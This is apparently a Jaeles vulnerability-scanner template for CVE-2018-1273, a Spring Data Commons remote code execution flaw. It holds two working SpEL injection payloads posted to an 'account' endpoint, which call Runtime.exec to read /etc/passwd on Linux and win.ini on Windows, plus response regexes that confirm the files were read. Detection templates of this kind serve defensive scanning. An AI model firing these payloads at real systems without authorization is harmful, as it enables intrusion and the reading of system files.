id: CVE-2018-1273 info: name: Spring Data Commons RCE risk: Critical params: - root: '{{.BaseURL}}' variables: - endpoint: | account requests: - method: POST url: >- {{.root}}/{{.endpoint}} headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 data: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat%20%2Fetc%2Fpasswd')]=jaeles detections: - >- StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") - method: POST url: >- {{.root}}/{{.endpoint}} headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 data: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type%20C%3A%5C%2FWindows%5C%2Fwin.ini')]=jaeles detections: - >- StatusCode() == 200 && RegexSearch("resBody", "\\[(font|extension|file)s\\]") references: - https://www.cvebase.com/cve/2018/1273